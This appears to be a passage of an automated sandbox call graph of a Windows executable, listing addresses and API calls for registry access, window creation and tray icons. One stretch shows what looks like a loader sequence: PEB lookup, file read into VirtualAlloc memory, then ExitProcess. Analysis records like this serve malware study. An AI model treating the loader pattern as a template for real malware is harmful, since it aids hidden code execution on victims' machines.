11 API calls 2 library calls 47142->47161 47149 c580b7 47144->47149 47145 c581a8 47162 c4918d EnterCriticalSection 47145->47162 47148 c581bb 47148->47144 47164 c52fa6 LeaveCriticalSection 47149->47164 47151 c580be 47151->47128 47152->47137 47153->47137 47154->47140 47156 c529fc __dosmaperr 47155->47156 47157 c529d3 RtlFreeHeap 47155->47157 47156->47142 47157->47156 47158 c529e8 47157->47158 47163 c4f2d9 20 API calls __dosmaperr 47158->47163 47160 c529ee GetLastError 47160->47156 47161->47145 47162->47148 47163->47160 47164->47151 47166 c3fddb 22 API calls 47165->47166 47167 c25734 47166->47167 47167->47083 47169 c242bc FindResourceExW 47168->47169 47170 c242d9 47168->47170 47169->47170 47171 c635ba LoadResource 47169->47171 47170->47095 47171->47170 47172 c635cf SizeofResource 47171->47172 47172->47170 47173 c635e3 LockResource 47172->47173 47173->47170 47175 c63d90 47174->47175 47176 c2512e 47174->47176 47180 c4ece3 47176->47180 47179->47088 47183 c4eaaa 47180->47183 47182 c2513c 47182->47095 47185 c4eab6 CallCatchBlock 47183->47185 47184 c4eac2 47196 c4f2d9 20 API calls __dosmaperr 47184->47196 47185->47184 47186 c4eae8 47185->47186 47198 c4918d EnterCriticalSection 47186->47198 47189 c4eac7 47197 c527ec 26 API calls __wsopen_s 47189->47197 47190 c4eaf4 47199 c4ec0a 62 API calls 2 library calls 47190->47199 47193 c4eb08 47200 c4eb27 LeaveCriticalSection __fread_nolock 47193->47200 47195 c4ead2 __wsopen_s 47195->47182 47196->47189 47197->47195 47198->47190 47199->47193 47200->47195 47204 c4e8e1 47201->47204 47203 c25118 47203->47101 47205 c4e8ed CallCatchBlock 47204->47205 47206 c4e900 ___scrt_fastfail 47205->47206 47207 c4e92d 47205->47207 47208 c4e925 __wsopen_s 47205->47208 47217 c4f2d9 20 API calls __dosmaperr 47206->47217 47219 c4918d EnterCriticalSection 47207->47219 47208->47203 47210 c4e937 47220 c4e6f8 38 API calls 4 library calls 47210->47220 47213 c4e91a 47218 c527ec 26 API calls __wsopen_s 47213->47218 47214 c4e94e 47221 c4e96c LeaveCriticalSection __fread_nolock 47214->47221 47217->47213 47218->47208 47219->47210 47220->47214 47221->47208 47225 c4e4e8 47222->47225 47224 c9275d 47224->47103 47228 c4e469 47225->47228 47227 c4e505 47227->47224 47229 c4e48c 47228->47229 47230 c4e478 47228->47230 47235 c4e488 __alldvrm 47229->47235 47238 c5333f 11 API calls 2 library calls 47229->47238 47236 c4f2d9 20 API calls __dosmaperr 47230->47236 47232 c4e47d 47237 c527ec 26 API calls __wsopen_s 47232->47237 47235->47227 47236->47232 47237->47235 47238->47235 47241 c92e7a 47239->47241 47240 c250f5 40 API calls 47240->47241 47241->47240 47242 c928fe 27 API calls 47241->47242 47243 c92d3b 47241->47243 47244 c2511f 64 API calls 47241->47244 47242->47241 47243->47013 47243->47031 47244->47241 47246 c922d9 47245->47246 47247 c922e7 47245->47247 47248 c4e5eb 29 API calls 47246->47248 47249 c9232c 47247->47249 47250 c4e5eb 29 API calls 47247->47250 47273 c922f0 47247->47273 47248->47247 47274 c92557 40 API calls __fread_nolock 47249->47274 47251 c92311 47250->47251 47251->47249 47256 c9231a 47251->47256 47253 c92370 47254 c92395 47253->47254 47255 c92374 47253->47255 47275 c92171 47254->47275 47257 c92381 47255->47257 47260 c4e678 67 API calls 47255->47260 47256->47273 47282 c4e678 47256->47282 47262 c4e678 67 API calls 47257->47262 47257->47273 47260->47257 47261 c9239d 47263 c923c3 47261->47263 47264 c923a3 47261->47264 47262->47273 47295 c923f3 74 API calls 47263->47295 47266 c923b0 47264->47266 47267 c4e678 67 API calls 47264->47267 47268 c4e678 67 API calls 47266->47268 47266->47273 47267->47266 47268->47273 47269 c923de 47272 c4e678 67 API calls 47269->47272 47269->47273 47270 c923ca 47270->47269 47271 c4e678 67 API calls 47270->47271 47271->47269 47272->47273 47273->47031 47274->47253 47276 c4ea0c ___std_exception_copy 21 API calls 47275->47276 47277 c9217f 47276->47277 47278 c4ea0c ___std_exception_copy 21 API calls 47277->47278 47279 c92190 47278->47279 47280 c4ea0c ___std_exception_copy 21 API calls 47279->47280 47281 c9219c 47280->47281 47281->47261 47283 c4e684 CallCatchBlock 47282->47283 47284 c4e695 47283->47284 47285 c4e6aa 47283->47285 47313 c4f2d9 20 API calls __dosmaperr 47284->47313 47294 c4e6a5 __wsopen_s 47285->47294 47296 c4918d EnterCriticalSection 47285->47296 47288 c4e69a 47314 c527ec 26 API calls __wsopen_s 47288->47314 47289 c4e6c6 47297 c4e602 47289->47297 47292 c4e6d1 47315 c4e6ee LeaveCriticalSection __fread_nolock 47292->47315 47294->47273 47295->47270 47296->47289 47298 c4e624 47297->47298 47299 c4e60f 47297->47299 47311 c4e61f 47298->47311 47316 c4dc0b 47298->47316 47348 c4f2d9 20 API calls __dosmaperr 47299->47348 47302 c4e614 47349 c527ec 26 API calls __wsopen_s 47302->47349 47308 c4e646 47333 c5862f 47308->47333 47311->47292 47312 c529c8 _free 20 API calls 47312->47311 47313->47288 47314->47294 47315->47294 47317 c4dc23 47316->47317 47318 c4dc1f 47316->47318 47317->47318 47319 c4d955 __fread_nolock 26 API calls 47317->47319 47322 c54d7a 47318->47322 47320 c4dc43 47319->47320 47350 c559be 62 API calls 3 library calls 47320->47350 47323 c4e640 47322->47323 47324 c54d90 47322->47324 47326 c4d955 47323->47326 47324->47323 47325 c529c8 _free 20 API calls 47324->47325 47325->47323 47327 c4d976 47326->47327 47328 c4d961 47326->47328 47327->47308 47351 c4f2d9 20 API calls __dosmaperr 47328->47351 47330 c4d966 47352 c527ec 26 API calls __wsopen_s 47330->47352 47332 c4d971 47332->47308 47334 c58653 47333->47334 47335 c5863e 47333->47335 47337 c5868e 47334->47337 47340 c5867a 47334->47340 47356 c4f2c6 20 API calls __dosmaperr 47335->47356 47358 c4f2c6 20 API calls __dosmaperr 47337->47358 47339 c58643 47357 c4f2d9 20 API calls __dosmaperr 47339->47357 47353 c58607 47340->47353 47341 c58693 47359 c4f2d9 20 API calls __dosmaperr 47341->47359 47345 c4e64c 47345->47311 47345->47312 47346 c5869b 47360 c527ec 26 API calls __wsopen_s 47346->47360 47348->47302 47349->47311 47350->47318 47351->47330 47352->47332 47361 c58585 47353->47361 47355 c5862b 47355->47345 47356->47339 47357->47345 47358->47341 47359->47346 47360->47345 47362 c58591 CallCatchBlock 47361->47362 47372 c55147 EnterCriticalSection 47362->47372 47364 c5859f 47365 c585c6 47364->47365 47366 c585d1 47364->47366 47373 c586ae 47365->47373 47388 c4f2d9 20 API calls __dosmaperr 47366->47388 47369 c585cc 47389 c585fb LeaveCriticalSection __wsopen_s 47369->47389 47371 c585ee __wsopen_s 47371->47355 47372->47364 47390 c553c4 47373->47390 47375 c586c4 47403 c55333 21 API calls 2 library calls 47375->47403 47377 c586be 47377->47375 47379 c553c4 __wsopen_s 26 API calls 47377->47379 47387 c586f6 47377->47387 47378 c5871c 47385 c5873e 47378->47385 47404 c4f2a3 20 API calls __dosmaperr 47378->47404 47381 c586ed 47379->47381 47380 c553c4 __wsopen_s 26 API calls 47382 c58702 CloseHandle 47380->47382 47386 c553c4 __wsopen_s 26 API calls 47381->47386 47382->47375 47383 c5870e GetLastError 47382->47383 47383->47375 47385->47369 47386->47387 47387->47375 47387->47380 47388->47369 47389->47371 47391 c553d1 47390->47391 47395 c553e6 47390->47395 47392 c4f2c6 __dosmaperr 20 API calls 47391->47392 47394 c553d6 47392->47394 47393 c4f2c6 __dosmaperr 20 API calls 47396 c55416 47393->47396 47397 c4f2d9 __dosmaperr 20 API calls 47394->47397 47395->47393 47398 c5540b 47395->47398 47399 c4f2d9 __dosmaperr 20 API calls 47396->47399 47400 c553de 47397->47400 47398->47377 47401 c5541e 47399->47401 47400->47377 47402 c527ec __wsopen_s 26 API calls 47401->47402 47402->47400 47403->47378 47404->47385 47406 c29cc2 _wcslen 47405->47406 47407 c3fe0b 22 API calls 47406->47407 47408 c29cea __fread_nolock 47407->47408 47409 c3fddb 22 API calls 47408->47409 47410 c29d00 47409->47410 47410->46890 47411->46907 47412 c22b83 7 API calls 47415 c22cd4 7 API calls 47412->47415 47414 c22c5e 47415->47414 47416 c22c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 47417 c58402 47422 c581be 47417->47422 47420 c5842a 47423 c581ef try_get_first_available_module 47422->47423 47433 c58338 47423->47433 47437 c48e0b 40 API calls 2 library calls 47423->47437 47425 c583ee 47441 c527ec 26 API calls __wsopen_s 47425->47441 47427 c58343 47427->47420 47434 c60984 47427->47434 47429 c5838c 47429->47433 47438 c48e0b 40 API calls 2 library calls 47429->47438 47431 c583ab 47431->47433 47439 c48e0b 40 API calls 2 library calls 47431->47439 47433->47427 47440 c4f2d9 20 API calls __dosmaperr 47433->47440 47442 c60081 47434->47442 47436 c6099f 47436->47420 47437->47429 47438->47431 47439->47433 47440->47425 47441->47427 47445 c6008d CallCatchBlock 47442->47445 47443 c6009b 47500 c4f2d9 20 API calls __dosmaperr 47443->47500 47445->47443 47447 c600d4 47445->47447 47446 c600a0 47501 c527ec 26 API calls __wsopen_s 47446->47501 47453 c6065b 47447->47453 47452 c600aa __wsopen_s 47452->47436 47503 c6042f 47453->47503 47456 c606a6 47521 c55221 47456->47521 47457 c6068d 47535 c4f2c6 20 API calls __dosmaperr 47457->47535 47460 c606ab 47461 c606b4 47460->47461 47462 c606cb 47460->47462 47537 c4f2c6 20 API calls __dosmaperr 47461->47537 47534 c6039a CreateFileW 47462->47534 47466 c60704 47468 c60781 GetFileType 47466->47468 47470 c60756 GetLastError 47466->47470 47539 c6039a CreateFileW 47466->47539 47467 c606b9 47538 c4f2d9 20 API calls __dosmaperr 47467->47538 47471 c6078c GetLastError 47468->47471 47473 c607d3 47468->47473 47540 c4f2a3 20 API calls __dosmaperr 47470->47540 47541 c4f2a3 20 API calls __dosmaperr 47471->47541 47472 c60692 47536 c4f2d9 20 API calls __dosmaperr 47472->47536 47543 c5516a 21 API calls 2 library calls 47473->47543 47477 c6079a CloseHandle 47477->47472 47480 c607c3 47477->47480 47479 c60749 47479->47468 47479->47470 47542 c4f2d9 20 API calls __dosmaperr 47480->47542 47481 c607f4 47483 c60840 47481->47483 47544 c605ab 72 API calls 3 library calls 47481->47544 47488 c6086d 47483->47488 47545 c6014d 72 API calls 4 library calls 47483->47545 47484 c607c8 47484->47472 47487 c60866 47487->47488 47489 c6087e 47487->47489 47490 c586ae __wsopen_s 29 API calls 47488->47490 47491 c600f8 47489->47491 47492 c608fc CloseHandle 47489->47492 47490->47491 47502 c60121 LeaveCriticalSection __wsopen_s 47491->47502 47546 c6039a CreateFileW 47492->47546 47494 c60927 47495 c6095d 47494->47495 47496 c60931 GetLastError 47494->47496 47495->47491 47547 c4f2a3 20 API calls __dosmaperr 47496->47547 47498 c6093d 47548 c55333 21 API calls 2 library calls 47498->47548 47500->47446 47501->47452 47502->47452 47504 c6046a 47503->47504 47505 c60450 47503->47505 47549 c603bf 47504->47549 47505->47504 47556 c4f2d9 20 API calls __dosmaperr 47505->47556 47508 c6045f 47557 c527ec 26 API calls __wsopen_s 47508->47557 47510 c604a2 47511 c604d1 47510->47511 47558 c4f2d9 20 API calls __dosmaperr 47510->47558 47512 c60524 47511->47512 47560 c4d70d 26 API calls 2 library calls 47511->47560 47512->47456 47512->47457 47515 c6051f 47515->47512 47518 c6059e 47515->47518 47516 c604c6 47559 c527ec 26 API calls __wsopen_s 47516->47559 47561 c527fc 11 API calls _abort 47518->47561 47520 c605aa 47522 c5522d CallCatchBlock 47521->47522 47564 c52f5e EnterCriticalSection 47522->47564 47524 c55259 47568 c55000 21 API calls 3 library calls 47524->47568 47527 c552a4 __wsopen_s 47527->47460 47528 c55234 47528->47524 47530 c552c7 EnterCriticalSection 47528->47530 47531 c5527b 47528->47531 47529 c5525e 47529->47531 47569 c55147 EnterCriticalSection 47529->47569 47530->47531 47532 c552d4 LeaveCriticalSection 47530->47532 47565 c5532a 47531->47565 47532->47528 47534->47466 47535->47472 47536->47491 47537->47467 47538->47472 47539->47479 47540->47472 47541->47477 47542->47484 47543->47481 47544->47483 47545->47487 47546->47494 47547->47498 47548->47495 47551 c603d7 47549->47551 47550 c603f2 47550->47510 47551->47550 47562 c4f2d9 20 API calls __dosmaperr 47551->47562 47553 c60416 47563 c527ec 26 API calls __wsopen_s 47553->47563 47555 c60421 47555->47510 47556->47508 47557->47504 47558->47516 47559->47511 47560->47515 47561->47520 47562->47553 47563->47555 47564->47528 47570 c52fa6 LeaveCriticalSection 47565->47570 47567 c55331 47567->47527 47568->47529 47569->47531 47570->47567 47571 c910c0 47572 c910fa 47571->47572 47577 c910cd 47571->47577 47573 c910fc 47615 c3fa11 53 API calls 47573->47615 47575 c91101 47582 c27510 47575->47582 47577->47572 47577->47573 47577->47575 47580 c910f4 47577->47580 47614 c2b270 39 API calls 47580->47614 47583 c27522 47582->47583 47584 c27525 47582->47584 47605 c26350 47583->47605 47585 c2755b 47584->47585 47586 c2752d 47584->47586 47587 c650f6 47585->47587 47590 c2756d 47585->47590 47597 c6500f 47585->47597 47616 c451c6 26 API calls 47586->47616 47619 c45183 26 API calls 47587->47619 47617 c3fb21 51 API calls 47590->47617 47591 c2753d 47594 c3fddb 22 API calls 47591->47594 47592 c6510e 47592->47592 47596 c27547 47594->47596 47598 c29cb3 22 API calls 47596->47598 47599 c3fe0b 22 API calls 47597->47599 47604 c65088 47597->47604 47598->47583 47600 c65058 47599->47600 47601 c3fddb 22 API calls 47600->47601 47602 c6507f 47601->47602 47603 c29cb3 22 API calls 47602->47603 47603->47604 47618 c3fb21 51 API calls 47604->47618 47606 c26362 47605->47606 47607 c64a51 47605->47607 47620 c26373 47606->47620 47630 c24a88 22 API calls __fread_nolock 47607->47630 47610 c64a5b 47612 c64a67 47610->47612 47631 c2a8c7 22 API calls __fread_nolock 47610->47631 47611 c2636e 47611->47572 47614->47572 47615->47575 47616->47591 47617->47591 47618->47587 47619->47592 47622 c26382 47620->47622 47626 c263b6 __fread_nolock 47620->47626 47621 c64a82 47625 c3fddb 22 API calls 47621->47625 47622->47621 47623 c263a9 47622->47623 47622->47626 47632 c2a587 47623->47632 47627 c64a91 47625->47627 47626->47611 47628 c3fe0b 22 API calls 47627->47628 47629 c64ac5 __fread_nolock 47628->47629 47630->47610 47631->47612 47633 c2a59d 47632->47633 47636 c2a598 __fread_nolock 47632->47636 47634 c3fe0b 22 API calls 47633->47634 47635 c6f80f 47633->47635 47634->47636 47636->47626 47637 c2344d 47638 c2345d __wsopen_s 47637->47638 47639 c2a961 22 API calls 47638->47639 47640 c23513 47639->47640 47668 c23a5a 47640->47668 47642 c2351c 47675 c23357 47642->47675 47647 c2515f 22 API calls 47648 c23544 47647->47648 47649 c2a961 22 API calls 47648->47649 47650 c2354d 47649->47650 47651 c2a6c3 22 API calls 47650->47651 47652 c23556 RegOpenKeyExW 47651->47652 47653 c63176 RegQueryValueExW 47652->47653 47657 c23578 47652->47657 47654 c63193 47653->47654 47655 c6320c RegCloseKey 47653->47655 47656 c3fe0b 22 API calls 47654->47656 47655->47657 47667 c6321e _wcslen 47655->47667 47658 c631ac 47656->47658 47659 c25722 22 API calls 47658->47659 47660 c631b7 RegQueryValueExW 47659->47660 47661 c631d4 47660->47661 47664 c631ee messages 47660->47664 47662 c26b57 22 API calls 47661->47662 47662->47664 47663 c24c6d 22 API calls 47663->47667 47664->47655 47665 c29cb3 22 API calls 47665->47667 47666 c2515f 22 API calls 47666->47667 47667->47657 47667->47663 47667->47665 47667->47666 47669 c61f50 __wsopen_s 47668->47669 47670 c23a67 GetModuleFileNameW 47669->47670 47671 c29cb3 22 API calls 47670->47671 47672 c23a8d 47671->47672 47673 c23aa2 23 API calls 47672->47673 47674 c23a97 47673->47674 47674->47642 47676 c61f50 __wsopen_s 47675->47676 47677 c23364 GetFullPathNameW 47676->47677 47678 c23386 47677->47678 47679 c26b57 22 API calls 47678->47679 47680 c233a4 47679->47680 47681 c233c6 47680->47681 47682 c630bb 47681->47682 47683 c233dd 47681->47683 47685 c3fddb 22 API calls 47682->47685 47690 c233ee 47683->47690 47687 c630c5 _wcslen 47685->47687 47686 c233e8 47686->47647 47688 c3fe0b 22 API calls 47687->47688 47689 c630fe __fread_nolock 47688->47689 47691 c233fe _wcslen 47690->47691 47692 c23411 47691->47692 47693 c6311d 47691->47693 47694 c2a587 22 API calls 47692->47694 47695 c3fddb 22 API calls 47693->47695 47696 c2341e __fread_nolock 47694->47696 47697 c63127 47695->47697 47696->47686 47698 c3fe0b 22 API calls 47697->47698 47699 c63157 __fread_nolock 47698->47699 47700 c210f3 47736 c21398 47700->47736 47704 c2116a 47705 c2a961 22 API calls 47704->47705 47706 c21174 47705->47706 47707 c2a961 22 API calls 47706->47707 47708 c2117e 47707->47708 47709 c2a961 22 API calls 47708->47709 47710 c21188 47709->47710 47711 c2a961 22 API calls 47710->47711 47712 c211c6 47711->47712 47713 c2a961 22 API calls 47712->47713 47714 c21292 47713->47714 47746 c2171c 47714->47746 47718 c212c4 47719 c2a961 22 API calls 47718->47719 47720 c212ce 47719->47720 47767 c31940 47720->47767 47722 c212f9 47777 c21aab 47722->47777 47724 c21315 47725 c21325 GetStdHandle 47724->47725 47726 c62485 47725->47726 47727 c2137a 47725->47727 47726->47727 47728 c6248e 47726->47728 47730 c21387 OleInitialize 47727->47730 47729 c3fddb 22 API calls 47728->47729 47731 c62495 47729->47731 47784 c9011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 47731->47784 47733 c6249e 47785 c90944 CreateThread 47733->47785 47735 c624aa CloseHandle 47735->47727 47786 c213f1 47736->47786 47739 c213f1 22 API calls 47740 c213d0 47739->47740 47741 c2a961 22 API calls 47740->47741 47742 c213dc 47741->47742 47743 c26b57 22 API calls 47742->47743 47744 c21129 47743->47744 47745 c21bc3 6 API calls 47744->47745 47745->47704 47747 c2a961 22 API calls 47746->47747 47748 c2172c 47747->47748 47749 c2a961 22 API calls 47748->47749 47750 c21734 47749->47750 47751 c2a961 22 API calls 47750->47751 47752 c2174f 47751->47752 47753 c3fddb 22 API calls 47752->47753 47754 c2129c 47753->47754 47755 c21b4a 47754->47755 47756 c21b58 47755->47756 47757 c2a961 22 API calls 47756->47757 47758 c21b63 47757->47758 47759 c2a961 22 API calls 47758->47759 47760 c21b6e 47759->47760 47761 c2a961 22 API calls 47760->47761 47762 c21b79 47761->47762 47763 c2a961 22 API calls 47762->47763 47764 c21b84 47763->47764 47765 c3fddb 22 API calls 47764->47765 47766 c21b96 RegisterWindowMessageW 47765->47766 47766->47718 47768 c31981 47767->47768 47775 c3195d 47767->47775 47793 c40242 5 API calls __Init_thread_wait 47768->47793 47771 c3198b 47771->47775 47794 c401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47771->47794 47772 c38727 47776 c3196e 47772->47776 47796 c401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47772->47796 47775->47776 47795 c40242 5 API calls __Init_thread_wait 47775->47795 47776->47722 47778 c21abb 47777->47778 47779 c6272d 47777->47779 47781 c3fddb 22 API calls 47778->47781 47797 c93209 23 API calls 47779->47797 47783 c21ac3 47781->47783 47782 c62738 47783->47724 47784->47733 47785->47735 47798 c9092a 28 API calls 47785->47798 47787 c2a961 22 API calls 47786->47787 47788 c213fc 47787->47788 47789 c2a961 22 API calls 47788->47789 47790 c21404 47789->47790 47791 c2a961 22 API calls 47790->47791 47792 c213c6 47791->47792 47792->47739 47793->47771 47794->47775 47795->47772 47796->47776 47797->47782 47799 c2b710 47800 c2b72b 47799->47800 47801 c70146 47800->47801 47802 c700f8 47800->47802 47828 c2b750 47800->47828 47858 ca58a2 196 API calls __Init_thread_footer 47801->47858 47805 c70102 47802->47805 47806 c7010f 47802->47806 47802->47828 47856 ca5d33 196 API calls 47805->47856 47825 c2ba20 47806->47825 47857 ca61d0 196 API calls __Init_thread_footer 47806->47857 47811 c3d336 40 API calls 47811->47828 47812 c703d9 47812->47812 47814 c2bbe0 40 API calls 47814->47828 47817 c2ba4e 47818 c70322 47862 ca5c0c 82 API calls 47818->47862 47825->47817 47863 c9359c 82 API calls __wsopen_s 47825->47863 47828->47811 47828->47814 47828->47817 47828->47818 47828->47825 47830 c2ec40 47828->47830 47847 c2a81b 41 API calls 47828->47847 47848 c3d2f0 40 API calls 47828->47848 47849 c3a01b 196 API calls 47828->47849 47850 c40242 5 API calls __Init_thread_wait 47828->47850 47851 c3edcd 22 API calls 47828->47851 47852 c400a3 29 API calls __onexit 47828->47852 47853 c401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47828->47853 47854 c3ee53 82 API calls 47828->47854 47855 c3e5ca 196 API calls 47828->47855 47859 c2aceb 23 API calls messages 47828->47859 47860 c7f6bf 23 API calls 47828->47860 47861 c2a8c7 22 API calls __fread_nolock 47828->47861 47845 c2ec76 messages 47830->47845 47831 c40242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 47831->47845 47832 c9359c 82 API calls 47836 c74af7 47832->47836 47833 c3fddb 22 API calls 47833->47845 47836->47832 47837 c74b0b 47867 c9359c 82 API calls __wsopen_s 47837->47867 47840 c2a8c7 22 API calls 47840->47845 47841 c2a961 22 API calls 47841->47845 47842 c2ed9d messages 47842->47828 47843 c400a3 29 API calls 47843->47845 47844 c2f3ae messages 47844->47836 47844->47842 47866 c9359c 82 API calls __wsopen_s 47844->47866 47845->47831 47845->47833 47845->47836 47845->47837 47845->47840 47845->47841 47845->47842 47845->47843 47845->47844 47846 c401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 47845->47846 47864 c301e0 196 API calls 2 library calls 47845->47864 47865 c306a0 41 API calls messages 47845->47865 47846->47845 47847->47828 47848->47828 47849->47828 47850->47828 47851->47828 47852->47828 47853->47828 47854->47828 47855->47828 47856->47806 47857->47825 47858->47828 47859->47828 47860->47828 47861->47828 47862->47825 47863->47812 47864->47845 47865->47845 47866->47836 47867->47836 47868 c24c91 47869 c2a961 22 API calls 47868->47869 47870 c24cff 47869->47870 47875 c23af0 47870->47875 47873 c24d9c 47874 c24dba 47873->47874 47878 c251f7 22 API calls __fread_nolock 47873->47878 47879 c23b1c 47875->47879 47878->47873 47880 c23b0f 47879->47880 47881 c23b29 47879->47881 47880->47873 47881->47880 47882 c23b30 RegOpenKeyExW 47881->47882 47882->47880 47883 c23b4a RegQueryValueExW 47882->47883 47884 c23b80 RegCloseKey 47883->47884 47885 c23b6b 47883->47885 47884->47880 47885->47884 47886 c3fc70 47887 c3fc85 47886->47887 47888 c3fd1d VirtualProtect 47887->47888 47889 c3fceb 47887->47889 47888->47889 47890 314bf60 47904 3149bb0 47890->47904 47892 314c02b 47907 314be50 47892->47907 47894 314c054 CreateFileW 47896 314c0a3 47894->47896 47897 314c0a8 47894->47897 47897->47896 47898 314c0bf VirtualAlloc 47897->47898 47898->47896 47899 314c0dd ReadFile 47898->47899 47899->47896 47900 314c0f8 47899->47900 47901 314ae50 13 API calls 47900->47901 47902 314c12b 47901->47902 47903 314c14e ExitProcess 47902->47903 47903->47896 47910 314d050 GetPEB 47904->47910 47906 314a23b 47906->47892 47908 314be59 Sleep 47907->47908 47909 314be67 47908->47909 47911 314d07a 47910->47911 47911->47906 47912 c23156 47915 c23170 47912->47915 47916 c23187 47915->47916 47917 c231e9 47916->47917 47918 c231eb 47916->47918 47919 c2318c 47916->47919 47920 c231d0 DefWindowProcW 47917->47920 47921 c231f1 47918->47921 47922 c62dfb 47918->47922 47923 c23265 PostQuitMessage 47919->47923 47924 c23199 47919->47924 47925 c2316a 47920->47925 47926 c231f8 47921->47926 47927 c2321d SetTimer RegisterWindowMessageW 47921->47927 47975 c218e2 10 API calls 47922->47975 47923->47925 47929 c231a4 47924->47929 47930 c62e7c 47924->47930 47931 c23201 KillTimer 47926->47931 47932 c62d9c 47926->47932 47927->47925 47934 c23246 CreatePopupMenu 47927->47934 47935 c231ae 47929->47935 47936 c62e68 47929->47936 47979 c8bf30 34 API calls ___scrt_fastfail 47930->47979 47971 c230f2 Shell_NotifyIconW ___scrt_fastfail 47931->47971 47938 c62dd7 MoveWindow 47932->47938 47939 c62da1 47932->47939 47933 c62e1c 47976 c3e499 42 API calls 47933->47976 47934->47925 47943 c62e4d 47935->47943 47944 c231b9 47935->47944 47978 c8c161 27 API calls ___scrt_fastfail 47936->47978 47938->47925 47946 c62dc6 SetFocus 47939->47946 47947 c62da7 47939->47947 47943->47920 47977 c80ad7 22 API calls 47943->47977 47950 c231c4 47944->47950 47951 c23253 47944->47951 47945 c62e8e 47945->47920 47945->47925 47946->47925 47947->47950 47952 c62db0 47947->47952 47948 c23214 47972 c23c50 DeleteObject DestroyWindow 47948->47972 47949 c23263 47949->47925 47950->47920 47960 c230f2 Shell_NotifyIconW ___scrt_fastfail 47950->47960 47973 c2326f 44 API calls ___scrt_fastfail 47951->47973 47974 c218e2 10 API calls 47952->47974 47958 c62e41 47961 c23837 47958->47961 47960->47958 47962 c23862 ___scrt_fastfail 47961->47962 47980 c24212 47962->47980 47965 c238e8 47967 c63386 Shell_NotifyIconW 47965->47967 47968 c23906 Shell_NotifyIconW 47965->47968 47984 c23923 47968->47984 47970 c2391c 47970->47917 47971->47948 47972->47925 47973->47949 47974->47925 47975->47933 47976->47950 47977->47917 47978->47949 47979->47945 47981 c635a4 47980->47981 47982 c238b7 47980->47982 47981->47982 47983 c635ad DestroyIcon 47981->47983 47982->47965 48006 c8c874 42 API calls _strftime 47982->48006 47983->47982 47985 c23a13 47984->47985 47986 c2393f 47984->47986 47985->47970 48007 c26270 47986->48007 47989 c63393 LoadStringW 47992 c633ad 47989->47992 47990 c2395a 47991 c26b57 22 API calls 47990->47991 47993 c2396f 47991->47993 48000 c23994 ___scrt_fastfail 47992->48000 48012 c2a8c7 22 API calls __fread_nolock 47992->48012 47994 c2397c 47993->47994 47995 c633c9 47993->47995 47994->47992 47997 c23986 47994->47997 47998 c26350 22 API calls 47995->47998 47999 c26350 22 API calls 47997->47999 48001 c633d7 47998->48001 47999->48000 48003 c239f9 Shell_NotifyIconW 48000->48003 48001->48000 48002 c233c6 22 API calls 48001->48002 48004 c633f9 48002->48004 48003->47985 48005 c233c6 22 API calls 48004->48005 48005->48000 48006->47965 48008 c3fe0b 22 API calls 48007->48008 48009 c26295 48008->48009 48010 c3fddb 22 API calls 48009->48010 48011 c2394d 48010->48011 48011->47989 48011->47990 48012->48000 48013 c22e37 48014 c2a961 22 API calls 48013->48014 48015 c22e4d 48014->48015 48092 c24ae3 48015->48092 48017 c22e6b 48018 c23a5a 24 API calls 48017->48018 48019 c22e7f 48018->48019 48020 c29cb3 22 API calls 48019->48020 48021 c22e8c 48020->48021 48022 c24ecb 94 API calls 48021->48022 48023 c22ea5 48022->48023 48024 c62cb0 48023->48024 48025 c22ead 48023->48025 48026 c92cf9 80 API calls 48024->48026 48106 c2a8c7 22 API calls __fread_nolock 48025->48106 48027 c62cc3 48026->48027 48029 c62ccf 48027->48029 48031 c24f39 68 API calls 48027->48031 48033 c24f39 68 API calls 48029->48033 48030 c22ec3 48107 c26f88 22 API calls 48030->48107 48031->48029 48035 c62ce5 48033->48035 48034 c22ecf 48036 c29cb3 22 API calls 48034->48036 48124 c23084 22 API calls 48035->48124 48037 c22edc 48036->48037 48108 c2a81b 41 API calls 48037->48108 48040 c22eec 48042 c29cb3 22 API calls 48040->48042 48041 c62d02 48125 c23084 22 API calls 48041->48125 48043 c22f12 48042->48043 48109 c2a81b 41 API calls 48043->48109 48046 c62d1e 48047 c23a5a 24 API calls 48046->48047 48048 c62d44 48047->48048 48126 c23084 22 API calls 48048->48126 48049 c22f21 48052 c2a961 22 API calls 48049->48052 48051 c62d50 48127 c2a8c7 22 API calls __fread_nolock 48051->48127 48054 c22f3f 48052->48054 48110 c23084 22 API calls 48054->48110 48055 c62d5e 48128 c23084 22 API calls 48055->48128 48058 c22f4b 48111 c44a28 40 API calls 3 library calls 48058->48111 48059 c62d6d 48129 c2a8c7 22 API calls __fread_nolock 48059->48129 48061 c22f59 48061->48035 48062 c22f63 48061->48062 48112 c44a28 40 API calls 3 library calls 48062->48112 48065 c62d83 48130 c23084 22 API calls 48065->48130 48066 c22f6e 48066->48041 48067 c22f78 48066->48067 48113 c44a28 40 API calls 3 library calls 48067->48113 48070 c62d90 48071 c22f83 48071->48046 48072 c22f8d 48071->48072 48114 c44a28 40 API calls 3 library calls 48072->48114 48074 c22f98 48075 c22fdc 48074->48075 48115 c23084 22 API calls 48074->48115 48075->48059 48076 c22fe8 48075->48076 48076->48070 48118 c263eb 22 API calls 48076->48118 48079 c22fbf 48116 c2a8c7 22 API calls __fread_nolock 48079->48116 48080 c22ff8 48119 c26a50 22 API calls 48080->48119 48083 c22fcd 48117 c23084 22 API calls 48083->48117 48084 c23006 48120 c270b0 23 API calls 48084->48120 48087 c23021 48088 c23065 48087->48088 48121 c26f88 22 API calls 48087->48121 48122 c270b0 23 API calls 48087->48122 48123 c23084 22 API calls 48087->48123 48093 c24af0 __wsopen_s 48092->48093 48094 c26b57 22 API calls 48093->48094 48095 c24b22 48093->48095 48094->48095 48104 c24b58 48095->48104 48131 c24c6d 48095->48131 48097 c29cb3 22 API calls 48100 c24c52 48097->48100 48098 c24c5e 48098->48017 48099 c29cb3 22 API calls 48099->48104 48101 c2515f 22 API calls 48100->48101 48101->48098 48102 c2515f 22 API calls 48102->48104 48103 c24c29 48103->48097 48103->48098 48104->48099 48104->48102 48104->48103 48105 c24c6d 22 API calls 48104->48105 48105->48104 48106->48030 48107->48034 48108->48040 